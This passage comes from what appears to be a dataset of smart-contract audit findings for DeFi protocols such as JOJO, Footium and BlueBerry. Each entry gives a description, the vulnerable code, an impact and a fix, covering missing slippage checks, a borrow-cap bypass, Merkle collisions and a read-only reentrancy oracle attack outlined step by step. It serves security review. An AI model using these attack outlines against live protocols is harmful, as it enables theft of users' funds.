`uint32`. 
The function getMarkPrice() will revert.","Change the newImpact argument from uint32 to uint256.\\n```\\n// Remove the line below\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n// Add the line below\\n function updateImpact(uint256 newImpact) external onlyOwner { \\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n",The UniswapPriceAdaptor will malfunction and not return the price from Uniswap Oracle.,"```\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n" +"In over liquidation, if the liquidatee has USDC-denominated assets for sale, the liquidator can buy the assets with USDC to avoid paying USDC to the liquidatee",medium,"In over liquidation, if the liquidatee has USDC-denominated assets for sale, the liquidator can buy the assets with USDC to avoid paying USDC to the liquidatee\\nIn JUSDBank contract, if the liquidator wants to liquidate more collateral than the borrowings of the liquidatee, the liquidator can pay additional USDC to get the liquidatee's collateral.\\n```\\n } else {\\n // actualJUSD = actualCollateral * priceOff\\n // = JUSDBorrowed * priceOff / priceOff * (1-insuranceFeeRate)\\n // = JUSDBorrowed / (1-insuranceFeeRate)\\n // insuranceFee = actualJUSD * insuranceFeeRate\\n // = actualCollateral * priceOff * insuranceFeeRate\\n // = JUSDBorrowed * insuranceFeeRate / (1- insuranceFeeRate)\\n liquidateData.actualCollateral = JUSDBorrowed\\n .decimalDiv(priceOff)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.insuranceFee = JUSDBorrowed\\n .decimalMul(reserve.insuranceFeeRate)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.actualLiquidatedT0 = liquidatedInfo.t0BorrowBalance;\\n liquidateData.actualLiquidated = JUSDBorrowed;\\n }\\n\\n liquidateData.liquidatedRemainUSDC = (amount -\\n liquidateData.actualCollateral).decimalMul(price);\\n```\\n\\nThe 
liquidator needs to pay USDC in the callback and the JUSDBank contract will require the final USDC balance of the liquidatee to increase.\\n```\\n require(\\n IERC20(primaryAsset).balanceOf(liquidated) -\\n primaryLiquidatedAmount >=\\n liquidateData.liquidatedRemainUSDC,\\n JUSDErrors.LIQUIDATED_AMOUNT_NOT_ENOUGH\\n );\\n```\\n\\nIf the liquidatee has USDC-denominated assets for sale, the liquidator can purchase the assets with USDC in the callback, so that the liquidatee's USDC balance will increase and the liquidator will not need to send USDC to the liquidatee to pass the check in the JUSDBank contract.",Consider banning over liquidation,"In case of over liquidation, the liquidator does not need to pay additional USDC to the liquidatee",```\\n } else {\\n // actualJUSD = actualCollateral * priceOff\\n // = JUSDBorrowed * priceOff / priceOff * (1-insuranceFeeRate)\\n // = JUSDBorrowed / (1-insuranceFeeRate)\\n // insuranceFee = actualJUSD * insuranceFeeRate\\n // = actualCollateral * priceOff * insuranceFeeRate\\n // = JUSDBorrowed * insuranceFeeRate / (1- insuranceFeeRate)\\n liquidateData.actualCollateral = JUSDBorrowed\\n .decimalDiv(priceOff)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.insuranceFee = JUSDBorrowed\\n .decimalMul(reserve.insuranceFeeRate)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.actualLiquidatedT0 = liquidatedInfo.t0BorrowBalance;\\n liquidateData.actualLiquidated = JUSDBorrowed;\\n }\\n\\n liquidateData.liquidatedRemainUSDC = (amount -\\n liquidateData.actualCollateral).decimalMul(price);\\n```\\n +FlashLoanLiquidate.JOJOFlashLoan has no slippage control when swapping USDC,medium,"FlashLoanLiquidate.JOJOFlashLoan has no slippage control when swapping USDC\\nIn both GeneralRepay.repayJUSD and FlashLoanRepay.JOJOFlashLoan, the user-supplied minReceive parameter is used for slippage control when swapping USDC.\\n```\\n function JOJOFlashLoan(\\n address asset,\\n uint256 
amount,\\n address to,\\n bytes calldata param\\n ) external {\\n (address approveTarget, address swapTarget, uint256 minReceive, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, ""receive amount is too small"");\\n// rest of code\\n function repayJUSD(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes memory param\\n ) external {\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n uint256 minReceive;\\n if (asset != USDC) {\\n (address approveTarget, address swapTarget, uint256 minAmount, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n minReceive = minAmount;\\n }\\n\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, ""receive amount is too small"");\\n```\\n\\nHowever, this is not done in FlashLoanLiquidate.JOJOFlashLoan, and the lack of slippage control may expose the user to sandwich attacks when swapping USDC.",Consider making FlashLoanLiquidate.JOJOFlashLoan use the minReceive parameter for slippage control when swapping USDC.,The lack of slippage control may expose the user to sandwich attacks when swapping USDC.,"```\\n function JOJOFlashLoan(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes calldata param\\n ) external {\\n (address approveTarget, address swapTarget, uint256 minReceive, bytes memory 
data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, ""receive amount is too small"");\\n// rest of code\\n function repayJUSD(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes memory param\\n ) external {\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n uint256 minReceive;\\n if (asset != USDC) {\\n (address approveTarget, address swapTarget, uint256 minAmount, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n minReceive = minAmount;\\n }\\n\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, ""receive amount is too small"");\\n```\\n" +JUSDBank users can bypass individual collateral borrow limits,medium,"JUSDBank imposes individual borrow caps on each collateral. 
The issue is that this can be bypassed due to the fact that withdraw and borrow use different methods to determine if an account is safe.\\n```\\n function borrow(\\n uint256 amount,\\n address to,\\n bool isDepositToJOJO\\n ) external override nonReentrant nonFlashLoanReentrant{\\n // t0BorrowedAmount = borrowedAmount / getT0Rate\\n DataTypes.UserInfo storage user = userInfo[msg.sender];\\n _borrow(user, isDepositToJOJO, to, amount, msg.sender);\\n require(\\n _isAccountSafeAfterBorrow(user, getTRate()),\\n JUSDErrors.AFTER_BORROW_ACCOUNT_IS_NOT_SAFE\\n );\\n }\\n```\\n\\nWhen borrowing the contract calls _isAccountSafeAfterBorrow. This imposes a max borrow on each collateral type that guarantees that the user cannot borrow more than the max for each collateral type. The issue is that withdraw doesn't impose this cap. This allows a user to bypass this cap as shown in the example below.\\nExample: Assume WETH and WBTC both have a cap of 10,000 borrow. The user deposits $30,000 WETH and takes a flashloan for $30,000 WBTC. Now they deposit both and borrow 20,000 JUSD. They then withdraw all their WBTC to repay the flashloan and now they have borrowed 20,000 against $30,000 in WETH",Always use _isAccountSafeAfterBorrow,Deposit caps can be easily surpassed creating systematic risk for the system,"```\\n function borrow(\\n uint256 amount,\\n address to,\\n bool isDepositToJOJO\\n ) external override nonReentrant nonFlashLoanReentrant{\\n // t0BorrowedAmount = borrowedAmount / getT0Rate\\n DataTypes.UserInfo storage user = userInfo[msg.sender];\\n _borrow(user, isDepositToJOJO, to, amount, msg.sender);\\n require(\\n _isAccountSafeAfterBorrow(user, getTRate()),\\n JUSDErrors.AFTER_BORROW_ACCOUNT_IS_NOT_SAFE\\n );\\n }\\n```\\n" +GeneralRepay#repayJUSD returns excess USDC to `to` address rather than msg.sender,medium,"When using GeneralRepay#repayJUSD `to` repay a position on JUSDBank, any excess tokens are sent `to` the `to` address. 
While this is fine for users that are repaying their own debt this is not good when repaying for another user. Additionally, specifying an excess `to` repay is basically a requirement when attempting `to` pay off the entire balance of an account. This combination of factors will make it very likely that funds will be refunded incorrectly.\\n```\\n IERC20(USDC).approve(jusdExchange, borrowBalance);\\n IJUSDExchange(jusdExchange).buyJUSD(borrowBalance, address(this));\\n IERC20(USDC).safeTransfer(to, USDCAmount - borrowBalance);\\n JUSDAmount = borrowBalance;\\n }\\n```\\n\\nAs seen above, when there is an excess amount of USDC, it is transferred `to` the `to` address which is the recipient of the repay. When `to` != msg.sender all excess will be sent `to` the recipient of the repay rather than being refunded `to` the caller.",Either send the excess back to the caller or allow them to specify where the refund goes,Refund is sent to the wrong address if to != msg.sender,"```\\n IERC20(USDC).approve(jusdExchange, borrowBalance);\\n IJUSDExchange(jusdExchange).buyJUSD(borrowBalance, address(this));\\n IERC20(USDC).safeTransfer(to, USDCAmount - borrowBalance);\\n JUSDAmount = borrowBalance;\\n }\\n```\\n" +Certain ERC20 token does not return bool from approve and transfer and transaction revert,medium,"Certain ERC20 token does not return bool from approve and transfer and transaction revert\\nAccording to\\nSome tokens do not return a bool on ERC20 methods and use IERC20 token interface will revert transaction\\nCertain ERC20 token does not return bool from approve and transfer and transaction revert\\n```\\n function setApprovalForERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n ) external onlyClubOwner {\\n erc20Contract.approve(to, amount);\\n }\\n```\\n\\nand\\n```\\nfunction transferERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n) external onlyClubOwner {\\n erc20Contract.transfer(to, amount);\\n}\\n```\\n\\nthe transfer / 
approve can fail silently",Issue Certain ERC20 token does not return bool from approve and transfer and transaction revert\\nUse Openzeppelin SafeTransfer / SafeApprove,Some tokens do not return a bool on ERC20 methods and use IERC20 token interface will revert transaction,"```\\n function setApprovalForERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n ) external onlyClubOwner {\\n erc20Contract.approve(to, amount);\\n }\\n```\\n" +Users might lose funds as `claimERC20Prize()` doesn't revert for no-revert-on-transfer tokens,medium,"Users can call `claimERC20Prize()` without actually receiving tokens if a no-revert-on-failure token is used, causing a portion of their claimable tokens to become unclaimable.\\nIn the `FootiumPrizeDistributor` contract, whitelisted users can call `claimERC20Prize()` to claim ERC20 tokens. The function adds the amount of tokens claimed to the user's total claim amount, and then transfers the tokens to the user:\\nFootiumPrizeDistributor.sol#L128-L131\\n```\\nif (value > 0) {\\n totalERC20Claimed[_token][_to] += value;\\n _token.transfer(_to, value);\\n}\\n```\\n\\nAs the return value from `transfer()` is not checked, `claimERC20Prize()` does not revert even when the transfer of tokens to the user fails.\\nThis could potentially cause users to lose assets when:\\n`_token` is a no-revert-on-failure token.\\nThe user calls `claimERC20Prize()` with `value` higher than the contract's token balance.\\nAs the contract has an insufficient balance, `transfer()` will revert and the user receives no tokens. However, as `claimERC20Prize()` succeeds, `totalERC20Claimed` is permanently increased for the user, thus the user cannot claim these tokens again.,Use `safeTransfer()` from Openzeppelin's SafeERC20 to transfer ERC20 tokens. 
Note that `transferERC20()` in `FootiumEscrow.sol` also uses `transfer()` and is susceptible to the same vulnerability.,"Users can call `claimERC20Prize()` without receiving the token amount specified. These tokens become permanently unclaimable for the user, leading to a loss of funds.","```\\nif (value > 0) {\\n totalERC20Claimed[_token][_to] += value;\\n _token.transfer(_to, value);\\n}\\n```\\n" +Users can bypass Player royalties on EIP2981 compatible markets by selling clubs as a whole,medium,"Players have a royalty built in but clubs do not. This allows bulk sale of players via clubs to bypass the fee when selling players.\\nFootiumPlayer.sol#L16-L23\\n```\\ncontract FootiumPlayer is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n ERC2981Upgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n\\nFootiumPlayer implements the EIP2981 standard which creates fees when buy/selling the players.\\nFootiumClub.sol#L15-L21\\n```\\ncontract FootiumClub is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n\\nFootiumClub on the other hand never implements this standard. 
This allows users to sell players by selling their club to avoid any kind of fee on player sales.",Implement EIP2981 on clubs as well,Users can bypass fees on player sales by selling club instead,"```\\ncontract FootiumPlayer is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n ERC2981Upgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n" +Merkle leaf values for _clubDivsMerkleRoot are 64 bytes before hashing which can lead to merkle tree collisions,medium,"FootiumAcademy hashes 64 bytes when calculating leaf allowing it to collide with the internal nodes of the merkle tree.\\nMerkleProofUpgradeable.sol puts the following warning at the beginning of the contract:\\n```\\n * WARNING: You should avoid using leaf values that are 64 bytes long prior to\\n * hashing, or use a hash function other than keccak256 for hashing leaves.\\n * This is because the concatenation of a sorted pair of internal nodes in\\n * the merkle tree could be reinterpreted as a leaf value.\\n```\\n\\nFootiumAcademy.sol#L235-L240\\n```\\n if (\\n !MerkleProofUpgradeable.verify(\\n divisionProof,\\n _clubDivsMerkleRoot,\\n keccak256(abi.encodePacked(clubId, divisionTier)) <- @audit-issue 64 bytes before hashing allows collisions with internal nodes\\n )\\n```\\n\\nThis is problematic because FootiumAcademy uses clubId and divisionTier as the base of the leaf, which are both uint256 (32 bytes each for 64 bytes total). This allows collision between leaves and internal nodes. 
These collisions could allow users to mint to divisions that otherwise would be impossible.",Use a combination of variables that doesn't sum to 64 bytes,Users can abuse merkle tree collisions to mint in non-existent divisions and bypass minting fees,"```\\n * WARNING: You should avoid using leaf values that are 64 bytes long prior to\\n * hashing, or use a hash function other than keccak256 for hashing leaves.\\n * This is because the concatenation of a sorted pair of internal nodes in\\n * the merkle tree could be reinterpreted as a leaf value.\\n```\\n" +AuraSpell#openPositionFarm uses incorrect join type for balancer,high,"The JoinPoolRequest uses """" for userData meaning that it will decode into 0. This is problematic because join requests of type 0 are ""init"" type joins and will revert for pools that are already initialized.\\n```\\nenum JoinKind { INIT, EXACT_TOKENS_IN_FOR_BPT_OUT, TOKEN_IN_FOR_EXACT_BPT_OUT }\\n```\\n\\nWe see above that enum JoinKind is INIT for 0 values.\\n```\\n return _joinExactTokensInForBPTOut(balances, normalizedWeights, userData);\\n } else if (kind == JoinKind.TOKEN_IN_FOR_EXACT_BPT_OUT) {\\n return _joinTokenInForExactBPTOut(balances, normalizedWeights, userData);\\n } else {\\n _revert(Errors.UNHANDLED_JOIN_KIND);\\n }\\n```\\n\\nHere user data is decoded into join type and since it is """" it will decode to type 0 which will result in a revert.",Uses JoinKind = 1 for user data,Users will be unable to open any farm position on AuraSpell,"```\\nenum JoinKind { INIT, EXACT_TOKENS_IN_FOR_BPT_OUT, TOKEN_IN_FOR_EXACT_BPT_OUT }\\n```\\n" +Users are forced to swap all reward tokens with no slippage protection,high,"AuraSpell forces users to swap their reward tokens to debt token but doesn't allow them to specify any slippage values.\\nAuraSpell.sol#L193-L203\\n```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), 
rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAbove all reward tokens are swapped and always use 0 for min out meaning that deposits will be sandwiched and stolen.",Allow user to specify slippage parameters for all reward tokens,All reward tokens can be sandwiched and stolen,"```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n" +ConvexSpell#closePositionFarm removes liquidity without any slippage protection,high,"ConvexSpell#closePositionFarm removes liquidity without any slippage protection allowing withdraws to be sandwiched and stolen. Curve liquidity has historically been strong but for smaller pairs their liquidity is getting low enough that it can be manipulated via flashloans.\\nConvexSpell.sol#L204-L208\\n```\\n ICurvePool(pool).remove_liquidity_one_coin(\\n amountPosRemove,\\n int128(tokenIndex),\\n 0\\n );\\n```\\n\\nLiquidity is removed as a single token which makes it vulnerable to sandwich attacks but no slippage protection is implemented. 
The same issue applies to CurveSpell.",Issue ConvexSpell#closePositionFarm removes liquidity without any slippage protection\\nAllow user to specify min out,User withdrawals can be sandwiched,"```\\n ICurvePool(pool).remove_liquidity_one_coin(\\n amountPosRemove,\\n int128(tokenIndex),\\n 0\\n );\\n```\\n" +WAuraPools will irreversibly break if reward tokens are added to pool after deposit,high,"WAuraPools will irreversibly break if reward tokens are added to pool after deposit due to an OOB error on accExtPerShare.\\nWAuraPools.sol#L166-L189\\n```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength(); <- @audit-issue rewardTokenCount pulled fresh\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n\\n @audit-issue attempts to pull from array which will be too small if tokens are added\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n\\naccExtPerShare stores the current rewardPerToken when the position is first created. It stores it as an array and only stores values for reward tokens that have been added prior to minting. 
This creates an issue if a reward token is added because now it will attempt to pull a value for an index that doesn't exist and throw an OOB error.\\nThis is problematic because pendingRewards is called every single transaction via the isLiquidatable subcall in BlueBerryBank#execute.",Use a mapping rather than an array to store values,WAuraPools will irreversibly break if reward tokens are added to pool after,"```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength(); <- @audit-issue rewardTokenCount pulled fresh\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n\\n @audit-issue attempts to pull from array which will be too small if tokens are added\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n" +UserData for balancer pool exits is malformed and will permanently trap users,high,"UserData for balancer pool exits is malformed and will result in all withdrawal attempts failing, trapping the user permanently.\\nAuraSpell.sol#L184-L189\\n```\\nwAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(tokens, minAmountsOut, """", false)\\n);\\n```\\n\\nWe see above that UserData is encoded as """". 
This is problematic as it doesn't contain the proper data for exiting the pool, causing all exit request to fail and trap the user permanently.\\n```\\nfunction exactBptInForTokenOut(bytes memory self) internal pure returns (uint256 bptAmountIn, uint256 tokenIndex) {\\n (, bptAmountIn, tokenIndex) = abi.decode(self, (WeightedPool.ExitKind, uint256, uint256));\\n}\\n```\\n\\nUserData is decoded into the data shown above when using ExitKind = 0. Since the exit uses """" as the user data this will be decoded as 0 a.k.a EXACT_BPT_IN_FOR_ONE_TOKEN_OUT. This is problematic because the token index and bptAmountIn should also be encoded in user data for this kind of exit. Since it isn't the exit call will always revert and the user will be permanently trapped.",Encode the necessary exit data in userData,"Users will be permanently trapped, unable to withdraw","```\\nwAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(tokens, minAmountsOut, """", false)\\n);\\n```\\n" +UniswapV3 sqrtRatioLimit doesn't provide slippage protection and will result in partial swaps,high,"The sqrtRatioLimit for UniV3 doesn't cause the swap to revert upon reaching that value. Instead it just cause the swap to partially fill. This is a known issue with using sqrtRatioLimit as can be seen here where the swap ends prematurely when it has been reached. This is problematic as this is meant to provide the user with slippage protection but doesn't.\\n```\\n if (amountToSwap > 0) {\\n SWAP_POOL = IUniswapV3Pool(vault.pool());\\n uint160 deltaSqrt = (param.sqrtRatioLimit *\\n uint160(param.sellSlippage)) / uint160(Constants.DENOMINATOR);\\n SWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? 
param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n );\\n }\\n```\\n\\nsqrtRatioLimit is used as slippage protection for the user but is ineffective and depending on what tokens are being swapped, tokens may be left the in the contract which can be stolen by anyone.",Check the amount received from the swap and compare it against some user supplied minimum,Incorrect slippage application can result in partial swaps and loss of funds,"```\\n if (amountToSwap > 0) {\\n SWAP_POOL = IUniswapV3Pool(vault.pool());\\n uint160 deltaSqrt = (param.sqrtRatioLimit *\\n uint160(param.sellSlippage)) / uint160(Constants.DENOMINATOR);\\n SWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n );\\n }\\n```\\n" +Balance check for swapToken in ShortLongSpell#_deposit is incorrect and will result in nonfunctional contract,high,"The balance checks on ShortLongSpell#_withdraw are incorrect and will make contract basically nonfunctional\\nswapToken is always vault.uToken. borrowToken is always required to be vault.uToken which means that swapToken == borrowToken. This means that the token borrowed is always required to be swapped.\\nShortLongSpell.sol#L83-L89\\n```\\n uint256 strTokenAmt = _doBorrow(param.borrowToken, param.borrowAmount);\\n\\n // 3. Swap borrowed token to strategy token\\n IERC20Upgradeable swapToken = ISoftVault(strategy.vault).uToken();\\n // swapData.fromAmount = strTokenAmt;\\n PSwapLib.megaSwap(augustusSwapper, tokenTransferProxy, swapData);\\n strTokenAmt = swapToken.balanceOf(address(this)) - strTokenAmt; <- @audit-issue will always revert on swap\\n```\\n\\nBecause swapToken == borrowToken if there is ever a swap then the swapToken balance will decrease. 
This causes L89 to always revert when a swap happens, making the contract completely non-functional",Remove check,ShortLongSpell is nonfunctional,"```\\n uint256 strTokenAmt = _doBorrow(param.borrowToken, param.borrowAmount);\\n\\n // 3. Swap borrowed token to strategy token\\n IERC20Upgradeable swapToken = ISoftVault(strategy.vault).uToken();\\n // swapData.fromAmount = strTokenAmt;\\n PSwapLib.megaSwap(augustusSwapper, tokenTransferProxy, swapData);\\n strTokenAmt = swapToken.balanceOf(address(this)) - strTokenAmt; <- @audit-issue will always revert on swap\\n```\\n" +ShortLongSpell#openPosition can cause user unexpected liquidation when increasing position size,high,"When increasing a position, all collateral is sent to the user rather than being kept in the position. This can cause serious issues because this collateral keeps the user from being liquidated. It may unexpectedly leave the user on the brink of liquidation where a small change in price leads to their liquidation.\\nShortLongSpell.sol#L129-L141\\n```\\n {\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n address posCollToken = pos.collToken;\\n uint256 collSize = pos.collateralSize;\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n }\\n```\\n\\nIn the above lines we can see that all collateral is burned and the user is sent the underlying tokens. 
This is problematic as it sends all the collateral to the user, leaving the position collateralized by only the isolated collateral.\\nBest case the user's transaction reverts but worst case they will be liquidated almost immediately.",Don't burn the collateral,Unfair liquidation for users,"```\\n {\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n address posCollToken = pos.collToken;\\n uint256 collSize = pos.collateralSize;\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n }\\n```\\n" +Pending CRV rewards are not accounted for and can cause unfair liquidations,high,"pendingRewards are factored into the health of a position so that the position collateral is fairly assessed. However WCurveGauge#pendingRewards doesn't return the proper reward tokens/amounts meaning that positions aren't valued correctly and users can be unfairly liquidated.\\nBlueBerryBank.sol#L408-L413\\n```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n\\nWhen BlueBerryBank is valuing a position it also values the pending rewards since they also have value.\\nWCurveGauge.sol#L106-L114\\n```\\nfunction pendingRewards(\\n uint256 tokenId,\\n uint256 amount\\n)\\n public\\n view\\n override\\n returns (address[] memory tokens, uint256[] memory rewards)\\n{}\\n```\\n\\nAbove we see that WCurveGauge#pendingRewards returns empty arrays when called. 
This means that pending rewards are not factored in correctly and users can be liquidated even when they should be safe.",Change WCurveGauge#pendingRewards to correctly return the pending rewards,User is liquidated when they shouldn't be,"```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n" +`BalancerPairOracle` can be manipulated using read-only reentrancy,high,"`BalancerPairOracle.getPrice` makes an external call to `BalancerVault.getPoolTokens` without checking the Balancer Vault's reentrancy guard. As a result, the oracle can be trivially manipulated to liquidate user positions prematurely.\\nIn February, the Balancer team disclosed a read-only reentrancy vulnerability in the Balancer Vault. The detailed disclosure can be found here. In short, all Balancer pools are susceptible to manipulation of their external queries, and all integrations must now take an extra step of precaution when consuming data. Via reentrancy, an attacker can force token balances and BPT supply to be out of sync, creating very inaccurate BPT prices.\\nSome protocols, such as Sentiment, remained unaware of this issue for a few months and were later hacked as a result.\\n`BalancerPairOracle.getPrice` makes a price calculation of the form `f(balances) / pool.totalSupply()`, so it is clearly vulnerable to synchronization issues between the two data points. 
A rough outline of the attack might look like this:\\n```\\nAttackerContract.flashLoan() ->\\n // Borrow lots of tokens and trigger a callback.\\n SomeProtocol.flashLoan() ->\\n AttackerContract.exploit()\\n\\nAttackerContract.exploit() ->\\n // Join a Balancer Pool using the borrowed tokens and send some ETH along with the call.\\n BalancerVault.joinPool() ->\\n // The Vault will return the excess ETH to the sender, which will reenter this contract.\\n // At this point in the execution, the BPT supply has been updated but the token balances have not.\\n AttackerContract.receive()\\n\\nAttackerContract.receive() ->\\n // Liquidate a position using the same Balancer Pool as collateral.\\n BlueBerryBank.liquidate() ->\\n // Call to the oracle to check the price.\\n BalancerPairOracle.getPrice() ->\\n // Query the token balances. At this point in the execution, these have not been updated (see above).\\n // So, the balances are still the same as before the start of the large pool join.\\n BalancerVaul.getPoolTokens()\\n\\n // Query the BPT supply. At this point in the execution, the supply has already been updated (see above).\\n // So, it includes the latest large pool join, and as such the BPT supply has grown by a large amount.\\n BalancerPool.getTotalSupply()\\n\\n // Now the price is computed using both balances and supply, and the result is much smaller than it should be.\\n price = f(balances) / pool.totalSupply()\\n\\n // The position is liquidated under false pretenses.\\n```\\n","The Balancer team recommends utilizing their official library to safeguard queries such as `Vault.getPoolTokens`. However, the library makes a state-modifying call to the Balancer Vault, so it is not suitable for `view` functions such as `BalancerPairOracle.getPrice`. There are then two options:\\nInvoke the library somewhere else. 
